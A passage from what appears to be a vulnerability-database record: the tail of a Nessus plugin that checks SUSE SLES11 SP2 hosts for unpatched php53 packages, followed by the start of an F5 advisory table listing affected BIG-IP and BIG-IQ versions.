value:\"https://bugzilla.suse.com/show_bug.cgi?id=969821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=971611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976996\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977003\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977005\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977991\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=980375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2004-1019/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2006-7243/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-0207/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3478/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3479/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3487/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3597/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3668/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2014-3669/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-3670/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4049/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4670/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4698/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4721/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-5459/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9652/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9705/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9709/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9767/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0231/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0273/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1352/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2301/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-2305/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2783/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2787/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3152/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3329/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3411/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4021/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4022/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4024/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4026/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4116/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4148/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4598/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4599/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4600/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4601/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-4602/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4603/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4643/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4644/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5589/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5590/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6831/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6833/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6837/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6838/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7803/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8835/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8838/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8866/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8867/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2015-8873/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8874/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8879/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2554/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3141/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3142/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4070/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4073/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4342/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4346/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4537/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4538/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4540/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4541/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2016-4543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5093/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5094/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5095/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5114/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161638-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dc947fb9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS :\n\nzypper in -t patch slessp2-php53-12621=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php53\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-mysql\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zip\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php53-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"apache2-mod_php53-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bcmath-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-bz2-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-calendar-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ctype-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-curl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dba-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-dom-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-exif-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fastcgi-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-fileinfo-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ftp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gd-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gettext-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-gmp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-iconv-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-intl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-json-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-ldap-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", 
sp:\"2\", reference:\"php53-mbstring-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mcrypt-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-mysql-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-odbc-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-openssl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pcntl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pdo-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pear-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pgsql-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-pspell-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-shmop-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-snmp-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-soap-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-suhosin-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvmsg-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvsem-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-sysvshm-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-tokenizer-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-wddx-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlreader-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xmlrpc-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", 
reference:\"php53-xmlwriter-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-xsl-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zip-5.3.17-47.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"php53-zlib-5.3.17-47.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-03-21T18:28:50", "description": "\nF5 Product Development has assigned ID 534075 (BIG-IP), ID 536881 (BIG-IQ), and ID 536882 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP AAM| 12.0.0 \n11.6.0 \n11.4.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP AFM| 12.0.0 \n11.6.0 \n11.3.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP Analytics| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP APM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP ASM| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane 
\nBIG-IP DNS| 12.0.0| 12.1.0| Low| PHP in Control Plane \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP GTM| 11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP Link Controller| 12.0.0 \n11.6.0 \n11.0.0 - 11.5.3 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP PEM| 12.0.0 \n11.6.0 \n11.3.0 - 11.5.3| 12.1.0 \n11.6.1 \n11.5.4| Low| PHP in Control Plane \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| PHP in Control Plane \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| PHP in Control Plane \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP in Control Plane \nBIG-IQ ADC| 4.5.0| None| Low| PHP in Control Plane \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None \n \n_**Important**: Although the software of the affected F5 products contains the vulnerable code, the affected F5 products do not use the vulnerable code in a way that exposes the vulnerability in a default configuration for the control plane. There is no data plane exposure for this vulnerability on the affected F5 products. _\n\nIf you are running a version listed in 